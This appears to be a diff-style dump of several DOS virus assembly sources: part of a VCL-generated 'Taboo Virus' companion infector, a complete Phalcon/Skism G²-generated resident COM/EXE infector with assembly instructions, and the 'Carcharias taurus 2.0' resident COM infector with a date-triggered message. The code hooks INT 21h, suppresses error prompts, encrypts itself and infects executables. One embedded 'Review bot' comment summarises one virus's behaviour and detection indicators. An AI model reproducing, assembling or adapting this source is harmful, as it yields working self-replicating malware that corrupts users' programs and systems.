mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
push bx ; Save old DTA address
|
||||
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,128 ; Allocate 128 bytes on stack
|
||||
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
lea dx,[bp - 128] ; DX points to buffer
|
||||
int 021h
|
||||
|
||||
mov ah,04Eh ; DOS find first function
|
||||
mov cx,00010000b ; CX holds search attributes
|
||||
mov dx,offset all_files ; DX points to "*.*"
|
||||
int 021h
|
||||
jc leave_traverse ; Leave if no files present
|
||||
|
||||
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
|
||||
jne another_dir ; If not, try again
|
||||
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
|
||||
je another_dir ;If so, keep going
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
lea dx,[bp - 98] ; DX points to new directory
|
||||
int 021h
|
||||
|
||||
call traverse ; Recursively call ourself
|
||||
|
||||
pushf ; Save the flags
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
mov dx,offset up_dir ; DX points to parent directory
|
||||
int 021h
|
||||
popf ; Restore the flags
|
||||
|
||||
jnc done_searching ; If we infected then exit
|
||||
|
||||
another_dir: mov ah,04Fh ; DOS find next function
|
||||
int 021h
|
||||
jnc check_dir ; If found check the file
|
||||
|
||||
leave_traverse:
|
||||
mov dx,offset exe_mask ; DX points to "*.EXE"
|
||||
call find_files ; Try to infect a file
|
||||
done_searching: mov sp,bp ; Restore old stack frame
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
pop dx ; Retrieve old DTA address
|
||||
int 021h
|
||||
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
|
||||
up_dir db "..",0 ; Parent directory name
|
||||
all_files db "*.*",0 ; Directories to search for
|
||||
exe_mask db "*.EXE",0 ; Mask for all .EXE files
|
||||
traverse endp
|
||||
|
||||
db 075h,03Dh,0BDh,095h,0EAh
|
||||
|
||||
|
||||
find_files proc near
|
||||
push bp ; Save BP
|
||||
|
||||
mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
push bx ; Save old DTA address
|
||||
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,128 ; Allocate 128 bytes on stack
|
||||
|
||||
push dx ; Save file mask
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
lea dx,[bp - 128] ; DX points to buffer
|
||||
int 021h
|
||||
|
||||
mov ah,04Eh ; DOS find first file function
|
||||
mov cx,00100111b ; CX holds all file attributes
|
||||
pop dx ; Restore file mask
|
||||
find_a_file: int 021h
|
||||
jc done_finding ; Exit if no files found
|
||||
call infect_file ; Infect the file!
|
||||
jnc done_finding ; Exit if no error
|
||||
mov ah,04Fh ; DOS find next file function
|
||||
jmp short find_a_file ; Try finding another file
|
||||
|
||||
done_finding: mov sp,bp ; Restore old stack frame
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
pop dx ; Retrieve old DTA address
|
||||
int 021h
|
||||
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
find_files endp
|
||||
|
||||
db 0E7h,096h,07Dh,03Ch,0BEh
|
||||
|
||||
infect_file proc near
|
||||
mov ah,02Fh ; DOS get DTA address function
|
||||
int 021h
|
||||
mov di,bx ; DI points to the DTA
|
||||
|
||||
lea si,[di + 01Eh] ; SI points to file name
|
||||
mov dx,si ; DX points to file name, too
|
||||
mov di,offset spawn_name + 1; DI points to new name
|
||||
xor ah,ah ; AH holds character count
|
||||
transfer_loop: lodsb ; Load a character
|
||||
or al,al ; Is it a NULL?
|
||||
je transfer_end ; If so then leave the loop
|
||||
inc ah ; Add one to the character count
|
||||
stosb ; Save the byte in the buffer
|
||||
jmp short transfer_loop ; Repeat the loop
|
||||
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
|
||||
mov byte ptr [di],13 ; Make CR the final character
|
||||
|
||||
mov di,dx ; DI points to file name
|
||||
xor ch,ch ;
|
||||
mov cl,ah ; CX holds length of filename
|
||||
mov al,'.' ; AL holds char. to search for
|
||||
repne scasb ; Search for a dot in the name
|
||||
mov word ptr [di],'OC' ; Store "CO" as first two bytes
|
||||
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
|
||||
|
||||
mov byte ptr [set_carry],0 ; Assume we'll fail
|
||||
mov ax,03D00h ; DOS open file function, r/o
|
||||
int 021h
|
||||
jnc infection_done ; File already exists, so leave
|
||||
mov byte ptr [set_carry],1 ; Success -- the file is OK
|
||||
|
||||
mov ah,03Ch ; DOS create file function
|
||||
mov cx,00100111b ; CX holds file attributes (all)
|
||||
int 021h
|
||||
xchg bx,ax ; BX holds file handle
|
||||
|
||||
call encrypt_code ; Write an encrypted copy
|
||||
|
||||
mov ah,03Eh ; DOS close file function
|
||||
int 021h
|
||||
|
||||
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
|
||||
ret ; Return to caller
|
||||
|
||||
spawn_name db 12,12 dup (?),13 ; Name for next spawn
|
||||
set_carry db ? ; Set-carry-on-exit flag
|
||||
infect_file endp
|
||||
|
||||
|
||||
db 08Dh,0EDh,035h,0A0h,000h
|
||||
|
||||
get_cpu proc near
|
||||
mov dx,86 ; Assume it's an 8088/8086
|
||||
push sp
|
||||
pop ax
|
||||
cmp sp,ax
|
||||
jne get_cpu_end ; If the test failed then exit
|
||||
mov dx,286 ; Assume it's an 80286
|
||||
pushf
|
||||
pop ax
|
||||
or ax,04000h
|
||||
popf
|
||||
pushf
|
||||
pop ax
|
||||
test ax,04000h
|
||||
jne get_cpu_end ; If the test failed then exit
|
||||
mov dx,386 ; Assume it's an 80386
|
||||
.386c ; We have to use 386 instructions
|
||||
mov ebx,esp
|
||||
and esp,0FFFCh
|
||||
pushfd
|
||||
pop eax
|
||||
mov ecx,eax
|
||||
xor ax,0004h
|
||||
push eax
|
||||
popfd
|
||||
pushfd
|
||||
pop eax
|
||||
and eax,0004h
|
||||
and ecx,0004h
|
||||
cmp eax,ecx
|
||||
je is_386 ; If the test failed it's a 386
|
||||
mov dx,486 ; It must be a 80486 then
|
||||
is_386: push ecx
|
||||
popfd
|
||||
mov esp,ebx
|
||||
get_cpu_end: xchg dx,ax ; Transfer chip type to AX
|
||||
ret ; Return to caller
|
||||
get_cpu endp
|
||||
|
||||
db 0F6h,016h,05Ch,072h,084h
|
||||
|
||||
get_day proc near
|
||||
mov ah,02Ah ; DOS get date function
|
||||
int 021h
|
||||
mov al,dl ; Copy day into AL
|
||||
cbw ; Sign-extend AL into AX
|
||||
ret ; Return to caller
|
||||
get_day endp
|
||||
|
||||
db 0C6h,02Eh,047h,0ACh,053h
|
||||
|
||||
get_dos_version proc near
|
||||
mov ah,030h ; DOS get DOS version function
|
||||
int 021h
|
||||
mov bx,ax ; Save return value in BX
|
||||
xor bl,bl ; Clear DOS major version in BX
|
||||
xchg bh,bl ; Place 0 in BH, minor in BL
|
||||
cbw ; Sign-extend AL into AX
|
||||
mov cl,100 ; CL holds multiplier
|
||||
mul cl ; Multiply AL by 100
|
||||
add ax,bx ; Add back the minor version
|
||||
ret ; Return to caller
|
||||
get_dos_version endp
|
||||
|
||||
db 03Ah,06Fh,04Ah,03Dh,091h
|
||||
|
||||
get_minute proc near
|
||||
mov ah,02Ch ; DOS get time function
|
||||
int 021h
|
||||
mov al,cl ; Copy minute into AL
|
||||
cbw ; Sign-extend AL into AX
|
||||
ret ; Return to caller
|
||||
get_minute endp
|
||||
|
||||
db 02Ah,0D1h,031h,0C6h,081h
|
||||
|
||||
get_rollover proc near
|
||||
push es ; Save ES
|
||||
mov ax,040h ; Set the extra segment to
|
||||
mov es,ax ; 040h (ROM BIOS)
|
||||
mov al,byte ptr [0070h] ; AL holds rollover flag
|
||||
cbw ; Sign-extend AL into AX
|
||||
pop es ; Restore ES
|
||||
ret ; Return to caller
|
||||
get_rollover endp
|
||||
|
||||
data00 db "*.Dat"
|
||||
|
||||
vcl_marker db "[VCL]",0 ; VCL creation marker
|
||||
|
||||
|
||||
note db "Taboo Virus"
|
||||
db "Version 2.12"
|
||||
db "By Virucidal Maniac"
|
||||
|
||||
encrypt_code proc near
|
||||
mov si,offset encrypt_decrypt; SI points to cipher routine
|
||||
|
||||
xor ah,ah ; BIOS get time function
|
||||
int 01Ah
|
||||
mov word ptr [si + 8],dx ; Low word of timer is new key
|
||||
|
||||
xor byte ptr [si],1 ;
|
||||
xor byte ptr [si + 7],1 ; Change all SIs to DIs
|
||||
xor word ptr [si + 10],0101h; (and vice-versa)
|
||||
|
||||
mov di,offset finish ; Copy routine into heap
|
||||
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
|
||||
push si ; Save SI for later
|
||||
push cx ; Save CX for later
|
||||
rep movsb ; Copy the bytes
|
||||
|
||||
mov si,offset write_stuff ; SI points to write stuff
|
||||
mov cx,5 ; CX holds length of write
|
||||
rep movsb ; Copy the bytes
|
||||
|
||||
pop cx ; Restore CX
|
||||
pop si ; Restore SI
|
||||
inc cx ; Copy the RET also this time
|
||||
rep movsb ; Copy the routine again
|
||||
|
||||
mov ah,040h ; DOS write to file function
|
||||
mov dx,offset start ; DX points to virus
|
||||
|
||||
call finish ; Encrypt/write/decrypt
|
||||
|
||||
ret ; Return to caller
|
||||
|
||||
write_stuff: mov cx,finish - start ; Length of code
|
||||
int 021h
|
||||
encrypt_code endp
|
||||
|
||||
end_of_code label near
|
||||
|
||||
encrypt_decrypt proc near
|
||||
mov si,offset start_of_code ; SI points to code to decrypt
|
||||
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
|
||||
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
|
||||
inc si ; Do the next word
|
||||
inc si ;
|
||||
loop xor_loop ; Loop until we're through
|
||||
ret ; Return to caller
|
||||
encrypt_decrypt endp
|
||||
finish label near
|
||||
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,313 @@
|
|||
; Virus generated by Gý 0.70á
|
||||
; Gý written by Dark Angel of Phalcon/Skism
|
||||
|
||||
; File: TARGET.ASM
|
||||
; [Gý Virus] by Phalcon/Skism
|
||||
|
||||
checkres1 = 'FF'
|
||||
checkres2 = 'FF'
|
||||
id = 'FF'
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
|
||||
; Assemble with:
|
||||
; TASM /m3 filename.ASM
|
||||
; TLINK filename.OBJ
|
||||
; EXE2BIN filename.EXE filename.COM
|
||||
org 0000h
|
||||
|
||||
start:
|
||||
call next
|
||||
next:
|
||||
pop bp
|
||||
sub bp, offset next
|
||||
|
||||
push es
|
||||
push ds
|
||||
|
||||
mov ax, checkres1 ; Installation check
|
||||
int 0021h
|
||||
cmp ax, checkres2 ; Already installed?
|
||||
jz done_install
|
||||
|
||||
mov ah, 004Ah ; alter memory allocation
|
||||
mov bx, 0FFFFh ; of segment at ES
|
||||
int 0021h
|
||||
|
||||
sub bx, (endheap-start+15)/16+1
|
||||
mov ah, 004Ah ; alter memory allocation
|
||||
int 0021h
|
||||
jc done_install
|
||||
sub word ptr ds:[0002h], (endheap-start+15)/16+1
|
||||
|
||||
mov ah, 0048h ; Allocate memory for the virus
|
||||
mov bx, (endheap-start+15)/16
|
||||
int 0021h
|
||||
jc done_install
|
||||
|
||||
mov es, ax
|
||||
dec ax
|
||||
mov ds, ax ; Get MCB
|
||||
|
||||
mov byte ptr ds:[0000h], 'Z' ; Mark end of chain
|
||||
mov word ptr ds:[0001h], 0008h ; Mark owner = DOS
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
xor di, di
|
||||
mov cx, (heap-start)/2+1 ; Bytes to move
|
||||
mov si, bp ; lea si,[bp+offset start]
|
||||
rep movsw
|
||||
|
||||
xor ax, ax
|
||||
mov ds, ax
|
||||
push ds
|
||||
lds ax, ds:[21h*4] ; Get old int handler
|
||||
mov word ptr es:oldint21, ax
|
||||
mov word ptr es:oldint21+2, ds
|
||||
pop ds
|
||||
mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
|
||||
mov ds:[21h*4+2], es ; in high memory
|
||||
|
||||
done_install:
|
||||
pop es
|
||||
pop ds
|
||||
cmp sp, id
|
||||
jne restore_COM
|
||||
restore_EXE:
|
||||
mov ax, es
|
||||
add ax, 0010h
|
||||
add cs:[bp+word ptr origCSIP+2], ax
|
||||
add ax, cs:[bp+word ptr origSPSS]
|
||||
cli
|
||||
mov ss, ax
|
||||
mov sp, cs:[bp+word ptr origSPSS+2]
|
||||
sti
|
||||
db 00EAh
|
||||
origCSIP db ?
|
||||
old3 db 0cdh,20h,0
|
||||
origSPSS dd ?
|
||||
|
||||
restore_COM:
|
||||
mov di, 0100h
|
||||
push di
|
||||
lea si, [bp+offset old3]
|
||||
movsw
|
||||
movsb
|
||||
ret
|
||||
|
||||
INT24:
|
||||
mov al, 0003h
|
||||
iret
|
||||
|
||||
int21:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
cmp ax, 4B00h ; execute?
|
||||
jz execute
|
||||
return:
|
||||
jmp exitint21
|
||||
execute:
|
||||
mov word ptr cs:filename, dx
|
||||
mov word ptr cs:filename+2, ds
|
||||
mov ax, 3524h
|
||||
int 0021h
|
||||
push es
|
||||
push bx
|
||||
|
||||
lea dx, INT24 ; ASSumes ds=cs
|
||||
mov ax, 2524h
|
||||
int 0021h
|
||||
|
||||
push cs
|
||||
pop es
|
||||
|
||||
|
||||
mov bx, dx
|
||||
cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM
|
||||
jz return ; Exit if so
|
||||
|
||||
lds dx, cs:filename
|
||||
mov ax, 4300h
|
||||
int 0021h
|
||||
jc return
|
||||
push cx
|
||||
push ds
|
||||
push dx
|
||||
|
||||
mov ax, 4301h ; clear file attributes
|
||||
push ax ; save for later use
|
||||
xor cx, cx
|
||||
int 0021h
|
||||
|
||||
mov ax, 3D02h
|
||||
lds dx, cs:filename
|
||||
int 0021h
|
||||
xchg ax, bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ax, 5700h ; get file time/date
|
||||
int 0021h
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov ah, 003Fh
|
||||
mov cx, 001Ah
|
||||
mov dx, offset readbuffer
|
||||
int 0021h
|
||||
|
||||
mov ax, 4202h
|
||||
xor cx, cx
|
||||
cwd
|
||||
int 0021h
|
||||
|
||||
cmp word ptr [offset readbuffer], 'ZM'
|
||||
jz checkEXE
|
||||
|
||||
mov cx, word ptr [offset readbuffer+1] ; jmp location
|
||||
add cx, heap-start+3 ; convert to filesize
|
||||
cmp ax, cx ; equal if already infected
|
||||
jz jmp_close
|
||||
|
||||
cmp ax, 65535-(endheap-start) ; check if too large
|
||||
ja jmp_close ; Exit if so
|
||||
|
||||
mov si, offset readbuffer
|
||||
mov di, offset old3
|
||||
movsb
|
||||
movsw
|
||||
|
||||
mov cx, 0003h
|
||||
sub ax, cx
|
||||
mov word ptr [offset readbuffer+1], ax
|
||||
mov dl, 00E9h
|
||||
mov byte ptr [offset readbuffer], dl
|
||||
jmp short continue_infect
|
||||
checkEXE:
|
||||
cmp word ptr [offset readbuffer+10h], id
|
||||
jnz skipp
|
||||
jmp_close:
|
||||
jmp close
|
||||
skipp:
|
||||
|
||||
lea si, readbuffer+14h
|
||||
lea di, origCSIP
|
||||
movsw ; Save original CS and IP
|
||||
movsw
|
||||
|
||||
sub si, 000Ah
|
||||
movsw ; Save original SS and SP
|
||||
movsw
|
||||
|
||||
push bx ; save file handle
|
||||
mov bx, word ptr [readbuffer+8] ; Header size in paragraphs
|
||||
mov cl, 0004h
|
||||
shl bx, cl
|
||||
|
||||
push dx ; Save file size on the
|
||||
push ax ; stack
|
||||
|
||||
sub ax, bx ; File size - Header size
|
||||
sbb dx, 0000h ; DX:AX - BX -> DX:AX
|
||||
|
||||
mov cx, 0010h
|
||||
div cx ; DX:AX/CX = AX Remainder DX
|
||||
|
||||
mov word ptr [readbuffer+14h], dx ; IP Offset
|
||||
mov word ptr [readbuffer+10h], id ; Initial SP
|
||||
mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment
|
||||
mov word ptr [readbuffer+16h], ax ; Para disp CS in module.
|
||||
|
||||
pop ax ; Filelength in DX:AX
|
||||
pop dx
|
||||
|
||||
add ax, heap-start
|
||||
adc dx, 0000h
|
||||
|
||||
mov cl, 0009h
|
||||
push ax
|
||||
shr ax, cl
|
||||
ror dx, cl
|
||||
stc
|
||||
adc dx, ax
|
||||
pop ax
|
||||
and ah, 0001h
|
||||
|
||||
mov word ptr [readbuffer+4], dx ; Fix-up the file size in
|
||||
mov word ptr [readbuffer+2], ax ; the EXE header.
|
||||
|
||||
pop bx ; restore file handle
|
||||
mov cx, 001Ah
|
||||
|
||||
continue_infect:
|
||||
push cx ; save # bytes to write
|
||||
|
||||
mov cx, heap-start
|
||||
mov ah, 0040h ; concatenate virus
|
||||
mov dx, offset start
|
||||
int 0021h
|
||||
|
||||
xor dx, dx
|
||||
xor cx, cx
|
||||
mov ax, 4200h
|
||||
int 0021h
|
||||
|
||||
|
||||
pop cx
|
||||
mov ah, 0040h
|
||||
mov dx, offset readbuffer
|
||||
int 0021h
|
||||
|
||||
|
||||
close:
|
||||
mov ax, 5701h ; restore file time/date
|
||||
pop dx
|
||||
pop cx
|
||||
int 0021h
|
||||
|
||||
mov ah, 003Eh
|
||||
int 0021h
|
||||
|
||||
pop ax ; restore file attributes
|
||||
pop dx ; get filename and
|
||||
pop ds
|
||||
pop cx ; attributes from stack
|
||||
int 0021h
|
||||
|
||||
pop dx
|
||||
pop ds
|
||||
mov ax, 2524h
|
||||
int 0021h
|
||||
|
||||
exitint21:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
db 00EAh ; return to original handler
|
||||
oldint21 dd ?
|
||||
|
||||
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
|
||||
creator db 'Phalcon/Skism',0
|
||||
virusname db '[Gý Virus]',0
|
||||
|
||||
heap:
|
||||
filename dd ?
|
||||
readbuffer db 1ah dup (?)
|
||||
endheap:
|
||||
end start
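Review bot: The header of this section (`; File: TARGET.ASM` through `; [Gý Virus] by Phalcon/Skism`) records only the generator and author, so an analyst cataloguing the sample gets no behavioural summary and no indicator list; I would add a short analysis comment under that header. It should state that the code goes resident by shrinking the host's allocation with AH=4Ah and lowering the PSP top-of-memory word at `ds:[0002h]`, allocating a block whose MCB it marks `'Z'` with owner `0008h`, and pointing the INT 21h vector into that block, where the handler acts only on AX=4B00h; it appends itself to COM files (first three bytes replaced by an `E9h` jump, re-infection detected by the size arithmetic after `jmp location`) and to EXE files (header rewritten, `id` stored in the initial-SP field at offset 10h as the infection marker), and it installs an INT 24h handler that returns AL=3 so critical errors never prompt the user. The static strings `[PS/Gý]`, `Phalcon/Skism` and `[Gý Virus]` beside `oldint21`, the `'Z'`/`0008h` MCB pattern above the normal end of the chain, and an INT 21h vector segment that is not DOS or a TSR of known provenance are the indicators worth listing for detection and memory forensics. The `checkres1`/`checkres2`/`id` equates are generator placeholders; a comment should note they define the installation check and EXE marker so a scanner author knows which bytes are configurable per build.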
|
|
@ -0,0 +1,378 @@
|
|||
TITLE The Carcharias taurus 2.0
|
||||
.MODEL Tiny
|
||||
.CODE
|
||||
.STARTUP
|
||||
|
||||
; Some Constants -------------------------------------------------------------
|
||||
DogSize equ 584-16-6
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
db 0E9h ; JMP Loader
|
||||
dw 3
|
||||
db 0
|
||||
dw 0256h
|
||||
; ************************** DOG LOADER **************************************
|
||||
Loader:
|
||||
|
||||
call GetBP ; Get BP
|
||||
GetBP: pop BP
|
||||
sub BP, 103h
|
||||
push AX ; Save AX
|
||||
|
||||
; Find Z-MCB -----------------------------------------------------------------
|
||||
mov AH, 52h
|
||||
int 21h
|
||||
|
||||
mov DX, ES:[BX-2]
|
||||
mov DI, (OFFSET Place)-6
|
||||
mov DS:[BP+DI], DX
|
||||
|
||||
NEXT0:
|
||||
mov DI, (OFFSET Place)-6
|
||||
mov ES, DS:[BP+DI]
|
||||
mov DX, ES:[3] ; Calc the next MCB seg
|
||||
inc DX
|
||||
add DS:[BP+DI], DX
|
||||
|
||||
cmp ES:[0], byte ptr 'Z'
|
||||
jne NEXT0
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Looking for the Dog behind Z-MCB -------------------------------------------
|
||||
push ES
|
||||
mov DX, ES
|
||||
add DX, ES:[3]
|
||||
inc DX
|
||||
mov ES, DX
|
||||
mov DX, ES:[3]
|
||||
pop ES
|
||||
cmp DX, 815Dh ; 815Dh - Dog's bytes
|
||||
je LExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Eat 1K in the Z-MCB, Current PSP, BIOS Data --------------------------------
|
||||
|
||||
push DS
|
||||
sub ES:[3], word ptr 40h ; Dec Z-MCB
|
||||
|
||||
mov AH, 62h
|
||||
int 21h
|
||||
mov DS, BX
|
||||
sub DS:[2], word ptr 40h ; Dec Curr PSP
|
||||
|
||||
xor DX, DX
|
||||
mov DS, DX
|
||||
dec word ptr DS:[413h]
|
||||
|
||||
pop DS
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Calculate Dog's segment adress ---------------------------------------------
|
||||
mov DX, CS
|
||||
add DX, ES:[3]
|
||||
mov ES, DX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Now load the Dog -----------------------------------------------------------
|
||||
xor DI, DI
|
||||
mov SI, BP
|
||||
add SI, 100h
|
||||
mov CX, DogSize
|
||||
cld
|
||||
rep movsb
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Hook 21h -------------------------------------------------------------------
|
||||
; Get old vector
|
||||
push ES
|
||||
mov AX, 3521h
|
||||
int 21h
|
||||
mov DX, ES
|
||||
pop ES
|
||||
mov DI, (OFFSET Exit21h)-100h-6+1
|
||||
mov ES:[DI], BX
|
||||
inc DI
|
||||
inc DI
|
||||
mov ES:[DI], DX
|
||||
|
||||
; Set 21h to Dog
|
||||
mov AX, 2521h
|
||||
mov DX, (OFFSET Dog)-100h-6
|
||||
push DS
|
||||
push ES
|
||||
pop DS
|
||||
int 21h
|
||||
pop DS
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Loader Exit ----------------------------------------------------------------
|
||||
LExit:
|
||||
; Restore first 6 bytes
|
||||
mov DI, (OFFSET M_6Bytes)-6
|
||||
mov AX, word ptr DS:[BP+DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov BX, word ptr DS:[BP+DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov CX, word ptr DS:[BP+DI]
|
||||
mov word ptr CS:[100h], AX
|
||||
mov word ptr CS:[102h], BX
|
||||
mov word ptr CS:[104h], CX
|
||||
|
||||
; Restore all registers
|
||||
pop AX
|
||||
xor BX, BX
|
||||
xor CX, CX
|
||||
xor DI, DI
|
||||
xor SI, SI
|
||||
xor BP, BP
|
||||
mov DX, 100h
|
||||
push DX
|
||||
xor DX, DX
|
||||
push DS
|
||||
pop ES
|
||||
ret
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; ************************** END of DOG LOADER *******************************
|
||||
|
||||
|
||||
; ******************************* DOG **************************************
|
||||
Dog:
|
||||
pushf
|
||||
cmp AX, 4B00h
|
||||
je D01
|
||||
jmp QuickExit
|
||||
D01: push AX
|
||||
push BX
|
||||
push CX
|
||||
push DX
|
||||
push DI
|
||||
push SI
|
||||
push DS
|
||||
push ES
|
||||
|
||||
push DX ; Store file name
|
||||
push DS
|
||||
|
||||
|
||||
; Effect ? -------------------------------------------------------------------
|
||||
mov AH, 2Ah
|
||||
int 21h
|
||||
cmp CX, 1993 ; After 1992
|
||||
jb EExit
|
||||
cmp DH, 1 ; Jan,
|
||||
jne EExit
|
||||
mov AH, 2Ch
|
||||
int 21h
|
||||
cmp CH, 14
|
||||
jne EExit
|
||||
cmp CL, 30
|
||||
jb EExit
|
||||
; yes!
|
||||
push CS
|
||||
pop DS
|
||||
mov CX, 20
|
||||
mov AH, 2
|
||||
mov SI, (OFFSET Tired)-100h-6
|
||||
CHN: mov DL, byte ptr DS:[SI]
|
||||
inc SI
|
||||
dec DL
|
||||
int 21h
|
||||
loop CHN
|
||||
; cli
|
||||
; hlt
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
EExit:
|
||||
; Store old int 24h vector ---------------------------------------------------
|
||||
mov AX, 3524h ; Get intrpt vector (ES:BX)
|
||||
int 21h
|
||||
mov DI, (OFFSET Old24h)-100h-6
|
||||
mov CS:[DI], BX ; Store BX
|
||||
inc DI
|
||||
inc DI
|
||||
mov CS:[DI], ES ; Store ES
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Set new int 24h handler ----------------------------------------------------
|
||||
mov AX, 2524h ; Set intrpt vector (DS:DX)
|
||||
mov DX, (OFFSET INT24)-100h-6
|
||||
push CS
|
||||
pop DS
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; -----------------------------------------------------
|
||||
pop DS
|
||||
pop DX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Open the file --------------------------------------------------------------
|
||||
mov AX, 3D02h
|
||||
int 21h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov CS:[DI], AX
|
||||
jnc D02
|
||||
jmp DExit
|
||||
D02:
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Read 1st 6 bytes -----------------------------------------------------------
|
||||
push CS
|
||||
pop DS
|
||||
mov AH, 3Fh
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov DX, (OFFSET M_6Bytes)-100h-6
|
||||
mov CX, 6
|
||||
int 21h
|
||||
jnc D03
|
||||
jmp DExit
|
||||
|
||||
D03:
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Check File Format ----------------------------------------------------------
|
||||
mov DI, (OFFSET M_6Bytes)-100h-6
|
||||
cmp CS:[DI], 4D5Ah
|
||||
jne D04
|
||||
jmp DExit
|
||||
D04: cmp CS:[DI], 5A4Dh
|
||||
je DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Check File for Dog ---------------------------------------------------------
|
||||
cmp CS:[DI+3], 0256h
|
||||
je DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Get and Store file Date&Time -----------------------------------------------
|
||||
mov AX, 5700h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
int 21h
|
||||
mov DI, (OFFSET FDate)-100h-6
|
||||
mov CS:[DI], DX
|
||||
inc DI
|
||||
inc DI
|
||||
mov CS:[DI], CX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Get and Store file Size ----------------------------------------------------
|
||||
mov AX, 4202h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
xor DX, DX
|
||||
xor CX, CX
|
||||
int 21h
|
||||
mov DI, (OFFSET FSize)-100h-6
|
||||
sub AX, 3
|
||||
mov CS:[DI], AX
|
||||
cmp AX, 64512
|
||||
ja DExit
|
||||
cmp AX, 6
|
||||
jb DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Add Dog to the file --------------------------------------------------------
|
||||
push CS
|
||||
pop DS
|
||||
mov AH, 40h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov CX, DogSize
|
||||
xor DX, DX
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Write 1st 6 bytes to file --------------------------------------------------
|
||||
; Move file ptr to the start
|
||||
mov AX, 4200h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
xor DX, DX
|
||||
xor CX, CX
|
||||
int 21h
|
||||
; Write ...
|
||||
mov AH, 40h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov CX, 6
|
||||
mov DX, (OFFSET DogCall)-100h-6
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
DExit:
|
||||
|
||||
; Set file Date&Time ---------------------------------------------------------
|
||||
mov AX, 5701h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov DI, (OFFSET FDate)-100h-6
|
||||
mov DX, CS:[DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov CX, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Close the file -------------------------------------------------------------
|
||||
mov AH, 3Eh
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Restore int 24h ------------------------------------------------------------
|
||||
mov AX, 2524h ; Set intrpt vector (DS:DX)
|
||||
mov DI, (OFFSET Old24h)-100h-6
|
||||
mov DX, CS:[DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov DS, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
pop ES
|
||||
pop DS
|
||||
pop SI
|
||||
pop DI
|
||||
pop DX
|
||||
pop CX
|
||||
pop BX
|
||||
pop AX
|
||||
|
||||
QuickExit: popf
|
||||
Exit21h: db 0EAh
|
||||
Int21hIP: dw 0 ; BX
|
||||
Int21hCS: dw 0 ; ES
|
||||
|
||||
